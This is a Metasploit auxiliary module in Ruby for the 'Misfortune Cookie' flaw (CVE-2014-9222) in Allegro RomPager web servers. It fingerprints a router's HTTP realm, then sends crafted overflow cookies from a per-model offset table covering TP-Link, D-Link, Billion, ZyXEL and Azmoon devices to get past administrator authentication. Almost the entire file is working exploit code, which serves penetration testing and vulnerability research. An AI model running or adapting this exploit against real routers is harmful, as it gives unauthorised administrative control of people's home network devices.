232 lines
7.6 KiB
Ruby
232 lines
7.6 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Auxiliary::Report
|
|
|
|
def initialize(info = {})
|
|
super(update_info(
|
|
info,
|
|
'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
|
|
'Description' => %q(
|
|
This module exploits HTTP servers that appear to be vulnerable to the
|
|
'Misfortune Cookie' vulnerability which affects Allegro Software
|
|
Rompager versions before 4.34 and can allow attackers to authenticate
|
|
to the HTTP service as an administrator without providing valid
|
|
credentials.
|
|
),
|
|
'Author' => [
|
|
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
|
|
'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
|
|
'Lior Oppenheim' # CVE-2014-9222
|
|
],
|
|
'References' => [
|
|
['CVE', '2014-9222'],
|
|
['URL', 'http://mis.fortunecook.ie'],
|
|
['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
|
|
['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
|
|
],
|
|
'DisclosureDate' => 'Dec 17 2014',
|
|
'License' => MSF_LICENSE
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'URI to test', '/']),
|
|
], Exploit::Remote::HttpClient
|
|
)
|
|
end
|
|
|
|
def headers
|
|
{
|
|
'Referer' => full_uri
|
|
}
|
|
end
|
|
|
|
# List of known values and models
|
|
def devices_list
|
|
{
|
|
:'AZ-D140W'=>
|
|
{:name=>'Azmoon', :model=>'AZ-D140W', :values=>[
|
|
[107367693, 13]
|
|
]},
|
|
:'BiPAC 5102S'=>
|
|
{:name=>'Billion', :model=>'BiPAC 5102S', :values=>[
|
|
[107369694, 13]
|
|
]},
|
|
:'BiPAC 5200'=>
|
|
{:name=>'Billion', :model=>'BiPAC 5200', :values=>[
|
|
[107369545, 9],
|
|
[107371218, 21]
|
|
]},
|
|
:'BiPAC 5200A'=>
|
|
{:name=>'Billion', :model=>'BiPAC 5200A', :values=>[
|
|
[107366366, 25],
|
|
[107371453, 9]
|
|
]},
|
|
:'BiPAC 5200GR4'=>
|
|
{:name=>'Billion', :model=>'BiPAC 5200GR4', :values=>[
|
|
[107367690, 21]
|
|
]},
|
|
:'BiPAC 5200SRD'=>
|
|
{:name=>'Billion', :model=>'BiPAC 5200SRD', :values=>[
|
|
[107368270, 1],
|
|
[107371378, 3],
|
|
[107371218, 13]
|
|
]},
|
|
:'DSL-2520U'=>
|
|
{:name=>'D-Link', :model=>'DSL-2520U', :values=>[
|
|
[107368902, 25]
|
|
]},
|
|
:'DSL-2600U'=>
|
|
{:name=>'D-Link', :model=>'DSL-2600U', :values=>[
|
|
[107366496, 13],
|
|
[107360133, 20]
|
|
]},
|
|
:'TD-8616'=>
|
|
{:name=> 'TP-Link', :model=>'TD-8616', :values=>[
|
|
[107371483, 21],
|
|
[107369790, 17],
|
|
[107371161, 1],
|
|
[107371426, 17],
|
|
[107370211, 5],
|
|
]},
|
|
:'TD-8817'=>
|
|
{:name=> 'TP-Link', :model=>'TD-8817', :values=>[
|
|
[107369790, 17],
|
|
[107369788, 1],
|
|
[107369522, 25],
|
|
[107369316, 21],
|
|
[107369321, 9],
|
|
[107351277, 20]
|
|
]},
|
|
:'TD-8820'=>
|
|
{:name=>'TP-Link', :model=>'TD-8820', :values=>[
|
|
[107369768, 17]
|
|
]},
|
|
:'TD-8840T'=>
|
|
{:name=>'TP-Link', :model=>'TD-8840T', :values=>[
|
|
[107369845, 5],
|
|
[107369790, 17],
|
|
[107369570, 1],
|
|
[107369766, 1],
|
|
[107369764, 5],
|
|
[107369688, 17]
|
|
]},
|
|
:'TD-W8101G'=>
|
|
{:name=>'TP-Link', :model=>'TD-W8101G', :values=>[
|
|
[107367772, 37],
|
|
[107367808, 21],
|
|
[107367751, 21],
|
|
[107367749, 13],
|
|
[107367765, 25],
|
|
[107367052, 25],
|
|
[107365835, 1]
|
|
]},
|
|
:'TD-W8151N'=>
|
|
{:name=>'TP-Link', :model=>'TD-W8151N', :values=>[
|
|
[107353867, 24]
|
|
]},
|
|
:'TD-W8901G'=>
|
|
{:name=> 'TP-Link', :model=>'TD-W8901G', :values=>[
|
|
[107367787, 21],
|
|
[107368013, 5],
|
|
[107367854, 9],
|
|
[107367751, 21],
|
|
[107367749, 13],
|
|
[107367765, 25],
|
|
[107367682, 21],
|
|
[107365835, 1],
|
|
[107367052, 25]
|
|
]},
|
|
:'TD-W8901GB'=>
|
|
{:name=>'TP-Link', :model=>'TD-W8901GB', :values=>[
|
|
[107367756, 13],
|
|
[107369393, 21]
|
|
]},
|
|
:'TD-W8901N'=>
|
|
{:name=>'TP-Link', :model=>'TD-W8901N', :values=>[
|
|
[107353880, 0]
|
|
]},
|
|
:'TD-W8951ND'=>
|
|
{:name=>'TP-Link', :model=>'TD-W8951ND', :values=>[
|
|
[107369839, 25],
|
|
[107369876, 13],
|
|
[107366743, 21],
|
|
[107364759, 25],
|
|
[107364759, 13],
|
|
[107364760, 21]
|
|
]},
|
|
:'TD-W8961NB'=>
|
|
{:name=>'TP-Link', :model=>'TD-W8961NB', :values=>[
|
|
[107369844, 17],
|
|
[107367629, 21],
|
|
[107366421, 13]
|
|
]},
|
|
:'TD-W8961ND'=>
|
|
{:name=>'TP-Link', :model=>'TD-W8961ND', :values=>[
|
|
[107369839, 25],
|
|
[107369876, 13],
|
|
[107364732, 25],
|
|
[107364771, 37],
|
|
[107364762, 29],
|
|
[107353880, 0],
|
|
[107353414, 36]
|
|
]},
|
|
:'P-660R-T3 v3'=> #This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
|
|
{:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
|
|
[107369567, 21]
|
|
]},
|
|
:'P-660RU-T3 v2'=> #Couldn't verify this
|
|
{:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
|
|
[107369567, 21]
|
|
]},
|
|
}
|
|
end
|
|
|
|
|
|
def check_response_fingerprint(res, fallback_status)
|
|
fp = http_fingerprint(response: res)
|
|
vprint_status("Fingerprint: #{fp}")
|
|
if /realm="(?<model>.+)"/ =~ fp
|
|
return model
|
|
end
|
|
fallback_status
|
|
end
|
|
|
|
def run
|
|
res = send_request_raw(
|
|
'uri' => normalize_uri(target_uri.path.to_s),
|
|
'method' => 'GET',
|
|
)
|
|
model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
|
|
if model != Exploit::CheckCode::Detected
|
|
devices = devices_list[model.to_sym]
|
|
if devices != nil
|
|
print_good("Detected device:#{devices[:name]} #{devices[:model]}")
|
|
devices[:values].each { |value|
|
|
cookie = "C#{value[0]}=#{'B'*value[1]}\x00"
|
|
res = send_request_raw(
|
|
'uri' => normalize_uri(target_uri.path.to_s),
|
|
'method' => 'GET',
|
|
'headers' => headers.merge('Cookie' => cookie)
|
|
)
|
|
if res != nil and res.code <= 302
|
|
print_good('Good response, please check host, authentication should be disabled')
|
|
break
|
|
else
|
|
print_error('Bad response')
|
|
end
|
|
}
|
|
else
|
|
print_error("No matching values for fingerprint #{model}")
|
|
end
|
|
else
|
|
print_error('Unknown device')
|
|
end
|
|
end
|
|
end
|